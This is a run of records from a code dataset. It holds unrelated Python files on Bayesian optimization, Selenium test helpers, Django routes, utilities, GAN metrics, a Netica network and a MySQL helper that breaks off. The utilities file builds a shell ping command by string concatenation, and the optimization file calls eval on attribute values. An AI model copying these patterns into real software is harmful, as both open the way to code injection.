dict.\n :param key: key for the dict\n :param data: data to store under the key\n :return:\n \"\"\"\n self.data_dump_dict[key] = data\n\n def save_dump_as_h5(self, path, filename):\n h5f = h5py.File(\"{}/{}.h5\".format(path, filename), 'w')\n for key in self.data_dump_dict:\n h5f.create_dataset(key, data=self.data_dump_dict[key])\n h5f.close()\n\n def save_dump_as_pickle(self, path, filename):\n file_to_write = open(\"{}/{}.pickle\".format(path, filename), \"wb\")\n pickle.dump(self.data_dump_dict, file_to_write)\n file_to_write.close()\n\n def set_context(self, context) -> NoReturn:\n \"\"\"Set the context to the Inspector to allow access from both sides\n :param context: context\n \"\"\"\n self.context = context\n self.test_y = self.context.callback(self.test_x)\n\n def set_inspector_path(self, path: str) -> NoReturn:\n self.inspector_path = path\n\n def get_json(self):\n json_dict = {}\n keys = [\"lower_bounds\", \"upper_bounds\", \"n_test_points\", \"test_x\", \"test_y\", \"estimate_test_data\",\n \"inspect_estimation\", \"estimations\", \"estimations_on_test_data\", \"inspect_optimization\",\n \"optimizations\", \"optimization_on_test_data\"]\n for k in keys:\n json_dict[k] = eval(getattr(self, k))\n return json_dict\n\n def add_estimation(self, estimation: dict) -> NoReturn:\n \"\"\"Store Inspector data of one estimation of an estimator for the 'live' data the estimation is applied on\n :param estimation: dictionary containing information to be stored\n \"\"\"\n self.estimations.append(estimation)\n\n def add_estimation_test_data(self, estimation: dict) -> NoReturn:\n \"\"\"Store Inspector data of one estimation of an estimator for the test data specified in the Inspector\n :param estimation: dictionary containing information to be stored\n \"\"\"\n self.estimations_on_test_data.append(estimation)\n\n # def reset_estimations(self):\n # self.estimations = []\n\n def add_optimization(self, optimization: dict) -> NoReturn:\n \"\"\"Store Inspector data of one optimization of an Optimizer for the 'live' data the optimization\n is applied on.\n :param optimization: dictionary containing information to be stored\n \"\"\"\n if len(self.optimizations)-1 >= self.context.bo_step:\n self.optimizations[self.context.bo_step] = optimization\n else:\n self.optimizations.append(optimization)\n\n def replace_last_optimization(self, optimization: dict) -> NoReturn:\n \"\"\"Store Inspector data of one optimization of an Optimizer for the 'live' data the optimization\n is applied on.\n :param optimization: dictionary containing information to be stored\n \"\"\"\n self.optimizations.append(optimization)\n\n def add_fit(self, fit: dict) -> NoReturn:\n \"\"\"Store Inspector data of one Keras model fit.\n :param fit: dictionary containing information to be stored\n \"\"\"\n self.fits.append(fit)\n\n def add_acq_evaluation(self, acq_evaluation: dict) -> NoReturn:\n \"\"\"Store Inspector data of an acquisition function evaluation.\n :param acq_evaluation: dictionary containing information to be stored\n \"\"\"\n if len(self.acqs)-1 >= self.context.bo_step:\n self.acqs[self.context.bo_step] = acq_evaluation\n else:\n self.acqs.append(acq_evaluation)\n\n def replace_last_acq_evaluation(self, acq_evaluation: dict) -> NoReturn:\n \"\"\"Store Inspector data of an acquisition function evaluation.\n :param acq_evaluation: dictionary containing information to be stored\n \"\"\"\n self.acqs.pop()\n self.acqs.append(acq_evaluation)\n\n def add_estimator(self, estimator: estimator):\n 
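# store a deep copy so that refitting the estimator in later BO steps cannot mutate the saved snapshot\n 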
self.estimators.append(deepcopy(estimator))\n\n @classmethod\n def read_inspector(cls, config: 'ConfigObj') -> 'Inspector':\n \"\"\"reads the configuration from the config file and creates the inspector accordingly.\n :param config: config parser instance\n :return: inspector instance\n \"\"\"\n lower_bounds = [float(i) for i in config[\"Inspector\"].as_list(\"lower_bound\")]\n upper_bounds = [float(i) for i in config[\"Inspector\"].as_list(\"upper_bound\")]\n\n return cls(\n lower_bounds=lower_bounds,\n upper_bounds=upper_bounds,\n n_test_points=config[\"Inspector\"].as_int(\"n_test_points\"),\n do_estimate_test_data=config[\"Inspector\"].as_bool(\"do_estimate_test_data\"),\n do_inspect_estimation=config[\"Inspector\"].as_bool(\"do_inspect_estimation\"),\n do_inspect_optimization=config[\"Inspector\"].as_bool(\"do_inspect_optimization\"),\n do_inspect_acq=config[\"Inspector\"].as_bool(\"do_inspect_acq\"),\n store_estimators=config[\"Inspector\"].as_bool(\"store_estimators\"),\n )\n\n\n","repo_name":"marketdesignresearch/NOMU","sub_path":"bayesian_optimization/bayesian_optimization/context/inspector.py","file_name":"inspector.py","file_ext":"py","file_size_in_byte":8523,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"97"} +{"seq_id":"5511333851","text":"from selenium.webdriver.common.by import By\nfrom model.group import Group\n\n\nclass GroupHelper:\n\n def __init__(self, app):\n self.app = app\n\n def create(self, group): # create a new group, fill in the fields, save it\n driver = self.app.driver\n self.open_groups_page()\n driver.find_element(By.CSS_SELECTOR, \"[name = \"\"new\"\"]\").click()\n self.fill_group_form(group)\n driver.find_element(By.NAME, \"submit\").click()\n self.return_to_group_page()\n self.group_cache = None\n\n def count(self): # count the number of groups in the list\n driver = self.app.driver\n self.open_groups_page()\n return len(driver.find_elements_by_name(\"selected[]\"))\n\n def change_field_value(self, field_name, text): # fill in the group fields, but only if they are not empty\n driver = self.app.driver\n if text is not None:\n driver.find_element(By.NAME, field_name).click()\n driver.find_element(By.NAME, field_name).clear()\n driver.find_element(By.NAME, field_name).send_keys(text)\n\n def delete_group_by_index(self, index): # delete a random group\n driver = self.app.driver\n self.open_groups_page()\n self.select_group_by_index(index)\n driver.find_element_by_name(\"delete\").click()\n self.return_to_group_page()\n self.group_cache = None\n\n def delete_first_group(self): # delete the first group in the list\n self.delete_group_by_index(0)\n\n def fill_group_form(self, group): # fill in the group fields\n self.change_field_value(\"group_name\", group.name)\n self.change_field_value(\"group_header\", group.header)\n self.change_field_value(\"group_footer\", group.footer)\n\n group_cache = None\n\n def get_group_list(self): # get the list of groups\n if self.group_cache is None:\n driver = self.app.driver\n self.open_groups_page()\n self.group_cache = []\n for element in driver.find_elements_by_css_selector(\"span.group\"):\n text = element.text\n id = element.find_element_by_name(\"selected[]\").get_attribute(\"value\")\n self.group_cache.append(Group(name=text,id=id))\n return list(self.group_cache)\n\n def modify_first_group(self, new_group_data): # edit the first group in the list\n self.modify_group_by_index(0, new_group_data)\n\n def modify_group_by_index(self, index, new_group_data): # edit a random group\n driver = 
self.app.driver\n self.open_groups_page()\n self.select_group_by_index(index)\n driver.find_element(By.NAME, \"edit\").click()\n self.fill_group_form(new_group_data)\n driver.find_element(By.NAME, \"update\").click()\n self.return_to_group_page()\n self.group_cache = None\n\n def open_groups_page(self): # go to the \"groups\" page\n driver = self.app.driver\n if not (driver.current_url.endswith(\"/group.php\") and len(driver.find_elements(By.CSS_SELECTOR, \"[name = \"\"new\"\"]\"))>0 ):\n driver.find_element(By.LINK_TEXT, \"groups\").click()\n\n def return_to_group_page(self): # return to the \"groups\" page\n driver = self.app.driver\n driver.find_element(By.LINK_TEXT, \"group page\").click()\n\n def select_first_group(self): # find and select the first group in the list\n driver = self.app.driver\n driver.find_element_by_name(\"selected[]\").click()\n\n def select_group_by_index(self, index): # find and select a group by index\n driver = self.app.driver\n driver.find_elements_by_name(\"selected[]\")[index].click()\n","repo_name":"sckobeleva/Barancev_python_for_testers","sub_path":"fixture/group.py","file_name":"group.py","file_ext":"py","file_size_in_byte":3988,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"97"} +{"seq_id":"31045281907","text":"from django.urls import path\n\nfrom .views import ColumnListCreateView, ColumnRetrieveUpdateDestroyAPIView, TaskListCreateView, \\\n TaskRetrieveUpdateDestroyAPIView\n\napp_name = 'tasks'\nurlpatterns = [\n path('column/',\n ColumnListCreateView.as_view(),\n name='column-list'),\n path('column//',\n ColumnRetrieveUpdateDestroyAPIView.as_view(),\n name='column-detail'),\n path('column//task/',\n TaskListCreateView.as_view(),\n name='task-list'),\n path('column//task//',\n TaskRetrieveUpdateDestroyAPIView.as_view(),\n name='task-detail'),\n]\n","repo_name":"roman-wsu/task-management-api","sub_path":"apps/tasks/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":657,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"97"} +{"seq_id":"20900073260","text":"#! /usr/bin/python\nimport re,sys,os\nimport json\nimport itertools\nimport loggerRecord,globalS\nfrom time import gmtime, strftime, localtime\nlogger = loggerRecord.get_logger()\n\nclass generic():\n ''' this class will have generic methods common to linux,neo4J,wowgic etc. 
Creating a separate class so that in case\n of future requirement this can be imported and readily used'''\n\n ############################################################################\n #Function Name : parseIpfromOutput #\n #Input : string #\n #Return Value : IP's list #\n ############################################################################\n def parseIpfromOutput(self,buf):\n ''' this function picks out the IP's from the buffer string and returns them in\n the form of a list'''\n\n ipArr = re.findall(\"\\d+\\.\\d+\\.\\d+\\.\\d+\",buf)\n logger.debug(\"IPs are %s\",ipArr)\n return ipArr\n\n ############################################################################\n #Function Name : dumpclean #\n #Input : dict variable #\n #Return Value : none #\n ############################################################################\n def dumpclean(obj):\n ''' so far this copied function is not used but placing it for future\n representation of python dictionaries'''\n\n logger.debug('Python Dictionary Printing start')\n if type(obj) == dict:\n for k, v in obj.items():\n if hasattr(v, '__iter__'):\n logger.debug('%s',k)\n dumpclean(v)\n else:\n logger.debug('%s : %s', (k, v))\n elif type(obj) == list:\n for v in obj:\n if hasattr(v, '__iter__'):\n dumpclean(v)\n else:\n logger.debug('%s', v)\n else:\n logger.debug('%s', obj)\n logger.debug('Python Dictionary Printing END')\n\n ############################################################################\n #Function Name : dictDumper #\n #Input : #\n #Return Value : #\n ############################################################################\n def dictDumper(self,obj, nested_level=0, output=sys.stdout):\n ''' recursive function for internal debugging purpose\n source:online'''\n spacing = ' '\n if type(obj) == dict:\n print >> output, '%s{' % ((nested_level) * spacing)\n for k, v in obj.items():\n if hasattr(v, '__iter__'):\n print >> output, '%s%s:' % ((nested_level + 1) * spacing, k)\n self.dictDumper(v, nested_level + 1, output)\n else:\n print >> output, '%s%s: %s' % ((nested_level + 1) * spacing, k, v)\n print >> output, '%s}' % (nested_level * spacing)\n elif type(obj) == list:\n print >> output, '%s[' % ((nested_level) * spacing)\n for v in obj:\n if hasattr(v, '__iter__'):\n self.dictDumper(v, nested_level + 1, output)\n else:\n print >> output, '%s%s' % ((nested_level + 1) * spacing, v)\n print >> output, '%s]' % ((nested_level) * spacing)\n else:\n print >> output, '%s%s' % (nested_level * spacing, obj)\n\n ############################################################################\n #Function Name : dateTimeFields #\n #Input : none #\n #Return Value : str contains local date & time #\n ############################################################################\n def dateTimeFields(self):\n ''' the way how I need the current timestamp which is to be used for file\n names and across all the log files as well'''\n\n return strftime(\"%Y%m%d_%H%M%S\", localtime())\n\n\n ############################################################################\n #Function Name : connCheck #\n #Input : ipAddress-> ip address of the machine #\n #Return Value : 1 on failure 0 on success #\n ############################################################################\n def connCheck(self,ipAddress):\n ''' issue ping command and check the reachability of the machine. 
So that\n basic health checkup is administered before doing ssh'''\n\n response = os.system(\"ping -c 1 -w 10 \" + ipAddress)\n #and then check the response...\n if response == 0:\n logger.info('hostname# %s is up!',ipAddress)\n return 0\n logger.error('hostname# %s is down!',ipAddress)\n return 1\n\n################################################################################\n","repo_name":"sathishsms/wowgic","sub_path":"common/generic.py","file_name":"generic.py","file_ext":"py","file_size_in_byte":5187,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"97"} +{"seq_id":"15626460110","text":"from nonebot import on_command\n\nadd_moral = on_command(\"德育\", aliases={\"添加德育\"}, priority=100, block=True)\nexport_moral = on_command(\"导出德育\", priority=100, block=True)\nexport_moral_images = on_command(\"导入德育截图\", aliases={\"导出德育图片\"}, priority=100, block=True)\n\n\n__helper__ = [\n {\n \"cmd\": \"德育\",\n \"alias\": [\"添加德育\"],\n \"params\": [\"学生姓名(班干部使用)\", \"说明事件\", \"证明图片\"],\n \"tags\": [\"添加\", \"德育\", \"学生\"],\n \"use\": [\n [\"德育\", \"说明一下是什么事情吧\"],\n [\"参加学校活动 [图片]\", \"OK\"],\n [[\"如果你是干部,可以为另外的同学添加\", \"德育 张同学 李同学\"], \"说明一下什么事情吧!\"],\n [\"参加学校活动 [图片]\", \"OK\"],\n ],\n \"doc\": \"德育功能只有学生可以使用,如果你是班干部的话可以为另外的同学添加德育,为其它学生添加德育动用的是查找的方式添加\",\n },\n {\n \"cmd\": \"导出德育\",\n \"params\": [\"导出的年月日(不填写表示本月)\", \"班级名字(教师才需要填写)\"],\n \"tags\": [\"导出\", \"德育\", \"学生\", \"教师\"],\n \"use\": [\n [\"导出德育\", \"[文件.xlsx]\"],\n [[\"如果你是教师的情况下\", \"导出德育\"], \"选择班级[列表]\"],\n [\"人工智能2101\", \"[文件.xlsx]\"],\n [[\"您可以指定导出的年月日\", \"导出德育 12\"], \"[今年12月文件.xlsx]\"],\n ],\n \"doc\": \"教师和学生都可以导出,也可以指定年月日,比如2023 12表示年月,2023 12 12表示指定日子\",\n },\n]\n","repo_name":"ClassRobot/ClassRobot","sub_path":"src/plugins/morals/commands.py","file_name":"commands.py","file_ext":"py","file_size_in_byte":1699,"program_lang":"python","lang":"zh","doc_type":"code","stars":5,"dataset":"github-code","pt":"97"} +{"seq_id":"36115420616","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\ndef randomwalk(largo):\r\n pasos=np.random.randint(-1,2,largo) \r\n return pasos.cumsum()\r\n\r\ndef caminata_mas_alejada(caminatas):\r\n caminata_alejada = []\r\n for caminata in caminatas:\r\n distancia = max(abs(caminata))\r\n caminata_alejada.append(distancia)\r\n return caminatas[caminata_alejada.index(max(caminata_alejada))]\r\n\r\n\r\n\r\ndef caminata_menos_alejada(caminatas):\r\n caminatas_puntaje = []\r\n for caminata in caminatas:\r\n acum = 0\r\n for distancia in caminata:\r\n acum += distancia\r\n caminatas_puntaje.append(abs(acum))\r\n return caminatas[caminatas_puntaje.index(min(caminatas_puntaje))]\r\n \r\n\r\n\r\nN = 100000\r\n\r\ncaminatas = []\r\nfig = plt.figure()\r\nplt.subplot(2, 1, 1)\r\nfor i in range(12):\r\n caminata = randomwalk(N)\r\n plt.plot(caminata)\r\n caminatas.append(caminata)\r\nprint(sum(caminatas))\r\nplt.title(\"12 Caminatas al azar\")\r\nplt.xticks([])\r\nplt.ylim(-500.0, 500.0)\r\n\r\n\r\nplt.subplot(2,2,3)\r\nplt.title(\"Camino más alejado\")\r\nplt.plot(caminata_mas_alejada(caminatas))\r\nplt.xticks([])\r\nplt.ylim(-500.0, 500.0)\r\n\r\nplt.subplot(2,2,4)\r\nplt.title(\"Camino menos alejado\")\r\nplt.plot(caminata_menos_alejada(caminatas))\r\nplt.xticks([])\r\nplt.ylim(-500.0, 500.0)\r\nplt.show()\r\n\r\n# 
%%\r\n","repo_name":"LucianoArgolo22/Python-Programming-Course","sub_path":"Clase07/random_walk.py","file_name":"random_walk.py","file_ext":"py","file_size_in_byte":1303,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"37852157151","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jun 5 13:27:41 2017\n\n@author: athar\n\"\"\"\nimport ssdu_utils as sutils\nimport sys\n\nrec_file = sys.argv[1]\nlig_file = sys.argv[2]\n\nwith open(lig_file) as f:\n ligLines = f.read().splitlines()\n \nwith open(rec_file) as f:\n recLines = f.read().splitlines()\n \nsutils.shiftLigAtomsSerial(recLines, ligLines)\nwith open('new_lig.pdb', 'w') as out_file:\n out_file.write('\\n'.join(ligLines))","repo_name":"athar71/Dimer-Classification","sub_path":"shift_ligand.py","file_name":"shift_ligand.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"} +{"seq_id":"32163261935","text":"from NeticaPy import Netica\nN=Netica()\nmesg=bytearray()\nenv=N.NewNeticaEnviron_ns(b\"\",None,b\"\")\n#env = N.NewNeticaEnviron_ns (b\"\",None,b\"\")\nres = N.InitNetica2_bn (env, mesg)\n\nprint(mesg.decode(\"utf-8\"))\n\nnet = N.NewNet_bn (b\"Convertion\", env)\n\nconverted = N. NewNode_bn (b\"Converted\", 2, net)\nemail = N.NewNode_bn (b\"Email\", 2, net)\ncompany = N.NewNode_bn (b\"Company\", 2, net)\njobTitle = N.NewNode_bn (b\"Job_Title\", 2, net)\npurpose = N.NewNode_bn (b\"Purpose\", 2, net)\nactivity = N.NewNode_bn (b\"Activity\", 2, net)\n\n\nN.SetNodeStateNames_bn (converted,b\"Yes, No\")\nN.SetNodeStateNames_bn (email, b\"Specific, Generic\")\nN.SetNodeStateNames_bn (company, b\"Specified, Not_Specified\")\nN.SetNodeStateNames_bn (jobTitle, b\"Present, Absent\")\nN.SetNodeStateNames_bn (purpose, b\"Specified, Not_Specified\")\nN.SetNodeStateNames_bn (activity, b\"Occured, Not_Occured\")\n\nnode_variables = {\n b\"Email\" : [b\"Specific\", b\"Generic\"],\n b\"Company\" : [b\"Specified\",b\"Not_Specified\"],\n b\"Job_Title\" : [b\"Present\", b\"Absent\"],\n b\"Purpose\" : [b\"Specified\",b\"Not_Specified\"],\n b\"Activity\" : [b\"Occured\", b\"Not_Occured\"]\n }\nnode_names=list(node_variables)\n\nN.AddLink_bn (converted, email)\nN.AddLink_bn (converted, company)\nN.AddLink_bn (converted, jobTitle)\nN.AddLink_bn (converted, purpose)\nN.AddLink_bn (converted, activity)\n\n\nN.SetNodeProbs (converted, 0.1302, 0.8698)\n\nN.SetNodeProbs (email, b\"Yes\", 0.8394, 0.1606)\nN.SetNodeProbs (email, b\"No\", 0.5895, 0.4105)\n\nN.SetNodeProbs (company, b\"Yes\", 0.6451, 0.3549)\nN.SetNodeProbs (company, b\"No\", 0.1864, 0.8136)\n\nN.SetNodeProbs (jobTitle, b\"Yes\", 0.6155, 0.3845)\nN.SetNodeProbs (jobTitle, b\"No\", 0.1697, 0.8303)\n\nN.SetNodeProbs (purpose, b\"Yes\", 0.40282, 0.59718)\nN.SetNodeProbs (purpose, b\"No\", 0.13177, 0.86823)\n\nN.SetNodeProbs (activity, b\"Yes\", 1.0, 0.0)\nN.SetNodeProbs (activity, b\"No\", 0.32406, 0.67594)\n\nN.CompileNet_bn (net)\n\n#belief = N.GetNodeBelief (b\"Converted\", b\"Yes\", net)\n#print \"\"\"The probability of convertion is %g\"\"\"% belief\n\n#for i in range(32):\n# x=map(int,bin(31-i)[2:].zfill(5))\n# msg=\"Given \"\n# N.CompileNet_bn(net)\n# for j in range(5):\n# N.EnterFinding (node_names[j], node_variables[node_names[j]][x[j]], net)\n# msg+=\"%s[%s], b\" % (node_names[j], node_variables[node_names[j]][x[j]])\n# belief = N.GetNodeBelief (b\"Converted\", b\"Yes\", net)\n# print msg,b\"the probability of 
convertion is %s\"% belief\n\nmsg= \"Given \"\nfor j in range(5):\n print(\"Choise for %s:\\n-1 : Unknown\" % node_names[j].decode('utf-8'))\n for k in range(len(node_variables[node_names[j]])):\n print(k,\" : \",node_variables[node_names[j]][k].decode('utf-8'))\n i = eval(input(\"Enter choice: \"))\n if i>=0 and i 0:\n\n cursor.execute(\n \"INSERT INTO public.source_crawls(source_key, last_scrape, last_diff) \"\n \"VALUES(%s, %s, %s) \"\n \"ON CONFLICT (source_key) \"\n \"DO UPDATE SET \"\n \"last_scrape = %s, \"\n \"last_diff = %s, \"\n \"last_update = NOW()\",\n (news_source, text, diff_string, text, diff_string))\n else:\n cursor.execute(\n \"INSERT INTO public.source_crawls(source_key, last_scrape) \"\n \"VALUES(%s, %s) \"\n \"ON CONFLICT (source_key) \"\n \"DO UPDATE SET \"\n \"last_scrape = %s, \"\n \"last_update = NOW()\",\n (news_source, text, text))\n connection.commit()\n\n\ndef create_db():\n return PostgresSource()\n","repo_name":"robjailall/stock_news_notifier","sub_path":"dbs/postgres_db.py","file_name":"postgres_db.py","file_ext":"py","file_size_in_byte":2546,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"19544692439","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Feb 2 17:53:46 2022\n\n@author: brochetc\n\nmetrics version 2\n\nFile include :\n \n metric2D and criterion2D APIs to be used by Trainer class from trainer_horovod\n provide a directly usable namespace from already implemented metrics\n\n\"\"\"\n\nimport metrics4arome.general_metrics as GM\nimport metrics4arome.wasserstein_distances as WD\nimport metrics4arome.sliced_wasserstein as SWD\nimport metrics4arome.spectrum_analysis as Spectral\nimport metrics4arome.inception_metrics as inception\nimport metrics4arome.scattering_metric as scat\nimport metrics4arome.structure_functions as sfunc\nimport metrics4arome.multivariate as multiv\nimport metrics4arome.length_scales as ls\nimport metrics4arome.quantiles_metric as quant\n\n\n###################### standard parameters\n\nvar_dict={'rr' : 0, 'u' : 1, 'v' : 2, 't2m' : 3 , 'orog' : 4}\n\nvar_dict_fake = {'u' : 0 , 'v' : 1, 't2m' : 2, 'orog' : 3}\n\nvars_wo_orog = ['u', 'v', 't2m']\n\n######################\n\n########################### High level APIs ##################################\n\nclass metric2D():\n def __init__(self,long_name, func, variables, names = 'metric'):\n \n \n \n self.long_name = long_name\n \n self.names = names # names for each of the func's output items\n \n self.func = func #should return np.array OR tensor to benefit from parallel estimation\n \n self.variables = variables # variables on which the metric is applied\n \n def selectVars(self, *args) :\n \n \"\"\"\n select in the input data the variables to compute metric on\n \"\"\"\n \n if len(args[0])==2 :\n \n real_data, fake_data = args[0]\n \n VI = [var_dict[v] for v in self.variables]\n VI_f = [var_dict_fake[v] for v in self.variables]\n \n real_data = real_data[:, VI,:,:]\n \n fake_data = fake_data[:, VI_f,:,:]\n \n return real_data, fake_data\n \n else :\n \n return args[0]\n \n\n def __call__(self, *args, **kwargs):\n \n \n ########## selecting variables check #########\n try :\n select = kwargs['select']\n except KeyError :\n \n select = True\n \n ############# selection ################\n \n if select :\n \n data = self.selectVars(args)\n \n else :\n \n data = args\n \n ########### computation ################\n\n reliq_kwargs ={ k :v for k,v in kwargs.items() if k!='select'}\n \n if 
len(data) == 2:\n \n return self.func(data[0], data[1] ,**reliq_kwargs)\n \n else :\n \n return self.func(data[0], **reliq_kwargs)\n \n#################\n#################\n \nclass criterion2D(metric2D):\n def __init__(self, long_name, func, variables):\n super().__init__(long_name, func, variables)\n\n##############################################################################\n ################## Metrics catalogue #####################\n \nstandalone_metrics = {'spectral_compute', 'struct_metric','ls_metric', 'IntraMapVariance',\n 'InterMapVariance'}\n\ndistance_metrics = {'Orography_RMSE', 'W1_Center', \"W1_Center_NUMPY\", \"W1_random\",\n \"W1_random_NUMPY\",\n \"pw_W1\",\n \"SWD_metric\", \"SWD_metric_torch\",\"fid\",\"scat_SWD_metric\",\n \"scat_SWD_metric_renorm\", \"multivar\", \"quant_metric\"}\n\n\n###################### Usable namespace #######################################\n \nOrography_RMSE = metric2D('RMS Error on orography synthesis ',\\\n GM.orography_RMSE,'orog')\n\nIntraMapVariance = metric2D('Mean intra-map variance of channels ',\\\n GM.intra_map_var,\n vars_wo_orog,names = ['intra_u', 'intra_v', 'intra_t2m'])\nInterMapVariance = metric2D('Mean Batch variance of channels ', \\\n GM.inter_map_var,\n vars_wo_orog, names = ['inter_u', 'inter_v', 'inter_t2m'])\n\n## crude Wasserstein distances\n\nW1_Center = criterion2D('Mean Wasserstein distance on center crop ',\\\n WD.W1_center, vars_wo_orog)\n\n\nW1_Center_NUMPY = criterion2D('Mean Wasserstein distance on center crop ',\\\n WD.W1_center_numpy, vars_wo_orog)\n\nW1_random = criterion2D('Mean Wasserstein distance on random selection ',\\\n WD.W1_random, vars_wo_orog)\n\nW1_random_NUMPY = criterion2D('Mean Wasserstein distance on random selection ',\\\n WD.W1_random_NUMPY, vars_wo_orog)\n\npw_W1 = metric2D('Point Wise Wasserstein distance', WD.pointwise_W1,\\\n vars_wo_orog)\n\n\n\n# Sliced Wasserstein Distance estimations\n\nsliced_w1 = SWD.SWD_API(image_shape=(128,128), numpy=True)\nSWD_metric = metric2D('Sliced Wasserstein Distance ',\\\n sliced_w1.End2End,\\\n vars_wo_orog, names=sliced_w1.get_metric_names())\n\nsliced_w1_torch = SWD.SWD_API(image_shape=(128,128), numpy=False)\nSWD_metric_torch = metric2D('Sliced Wasserstein Distance ',\\\n sliced_w1_torch.End2End,\\\n vars_wo_orog, names=sliced_w1_torch.get_metric_names())\n\n# spectral analysis\n\nspectral_dist = metric2D('Power Spectral Density RMSE ',\\\n Spectral.PSD_compare, vars_wo_orog)\n\nspectral_compute = metric2D('Power Spectral Density ',\\\n Spectral.PowerSpectralDensity, vars_wo_orog)\n\n\n\n# scattering metrics with sparsity and shape estimators\n\n\nscat_sparse = scat.scattering_metric(\n J=4,L=8,shape=(127,127), estimators=['s21', 's22'],\n frontend='torch', backend='torch', cuda=True\n )\n#two versions of the same metric with different calculation processes (see file)\n\nscat_SWD_metric = metric2D('Scattering Estimators ', scat_sparse.scattering_sliced,\\\n vars_wo_orog)\n\nscat_SWD_metric_renorm = metric2D('Scattering Estimator', scat_sparse.scattering_renorm,\n vars_wo_orog)\n\n# structure functions \n\nstruct_metric = metric2D('First order structure function', \n lambda data : sfunc.increments(data, max_length = 16),\\\n vars_wo_orog)\n\n#multivariate_comparisons\nmultivar = metric2D('Multivariate data', multiv.multi_variate_correlations,\\\n vars_wo_orog, names=['Corr_f','Corr_r'])\n\n# Correlation length maps\n\nscale = 2.5\nls_metric = metric2D('Correlation length maps', lambda data : ls.length_scale(data, sca =scale),\\\n 
vars_wo_orog)\n\n# quantile scores\n\nqlist = [0.01,0.1,0.9,0.99]\n\nquant_metric = metric2D('Quantiles RMSE score', lambda real, fake : quant.quantile_score(real, fake, qlist = qlist), \\\n vars_wo_orog)\n","repo_name":"flyIchtus/multivariate-GAN","sub_path":"gan_horovod/metrics4arome/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":7020,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"92"} +{"seq_id":"720822852","text":"#! /usr/bin/env python3\n# -*- coding: utf-8 -*-\nimport copy\nimport traceback\nimport re\nimport pymysql\nfrom pymysql.cursors import DictCursor, SSCursor, SSDictCursor, Cursor as DefaultCursor\ntry:\n from dbutils.pooled_db import PooledDB\nexcept:\n from DBUtils.PooledDB import PooledDB\nfrom typing import Iterable, List, Tuple, Union\nfrom pymysql.constants import CLIENT\nimport logging\nlogger = logging.getLogger(__name__)\nlogger.setLevel(level=logging.INFO)\nhandler = logging.StreamHandler()\nhandler.setLevel(logging.INFO)\nformatter = logging.Formatter('%(asctime)s -%(name)s.py -[%(levelname)s] - %(message)s')\nhandler.setFormatter(formatter)\nlogger.addHandler(handler)\n\n\nclass OperationError(Exception):\n \"\"\"\n 用来查询失败时装填错误信息,同时使其bool值为False 方便识别是正常结果还是错误\n \"\"\"\n\n def __bool__(self):\n return False\n\n\nclass Like(object):\n \"\"\"\n 用来构造 like 语句\n \"\"\"\n\n def __init__(self, string: str) -> None:\n if '%' in string:\n string = string.replace('%', '%%%%')\n else:\n string = '%%' + string+'%%'\n\n self.string = string\n\n def __repr__(self):\n return self.string\n\n\nclass SqlGenerator(object):\n \"\"\"\n 该类下的方法的返回值必须为两个 \n 第一个是sql,第二个是参数\n \"\"\"\n\n @classmethod\n def get_all_column_sql(cls, table_name, dbname=None):\n \"\"\"返回对应表的所有字段\"\"\"\n\n table_name = table_name if not dbname else dbname+\".\"+table_name\n sql = \"SELECT COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME=%s order by COLUMN_NAME;\"\n return sql, (table_name,)\n\n @classmethod\n def generate_select_sql(cls, columns: Union[Tuple[str], List[str], str] = 'id', table: str = None, where=str or dict, group_by: str = None,\n order_by: str = None, limit: int = None, offset: int = None):\n \"\"\"\n 设要查询两个字段id和name,则 columns 为('id','name') / ['id','name'] / 'id,name'\n 要查询所有字段 使用 columns='*' 即可\n\n where 为字典 或字符串\n \"\"\"\n assert table, \"table不能为空\" # table 不能为空。但是参数里为了做到字段在前,table参数只能也设默认值为None\n columns = columns if isinstance(columns, str) else ','.join(columns)\n\n sql = \"SELECT {} from `{}` \".format(columns, table)\n params = None\n if where:\n where_tags, where_param = cls.generate_where_sql(where)\n sql += \"where {}\".format(where_tags)\n params = where_param\n\n for key, fs in ((group_by, 'group by'), (order_by, 'order by'), (limit, 'limit'), (offset, 'offset')):\n if key:\n sql += ' {} {}'.format(fs, key)\n\n return sql, params\n\n @classmethod\n def _get_after_format_sql(cls, init_sql, table, data: dict or List[dict], columns: Union[Tuple[str], List[str], str] = None):\n \"\"\"\n 生成sql语句里需要插入的字段和对应的格式化符号\n @columns: 需要格式化的字段。默认去第一个传入的字典数据的键值对\n \"\"\"\n if isinstance(columns, str):\n columns = (columns,)\n if not columns:\n if isinstance(data, dict):\n columns = data.keys()\n else:\n columns = data[0].keys()\n\n format_tags = ','.join(('%({})s'.format(col) for col in columns))\n final_sql = init_sql.format(table, '`'+'`,`'.join(columns)+'`', format_tags)\n return final_sql, data\n\n @classmethod\n def generate_insert_sql(cls, table, data: dict or List[dict], columns: Union[Tuple[str], 
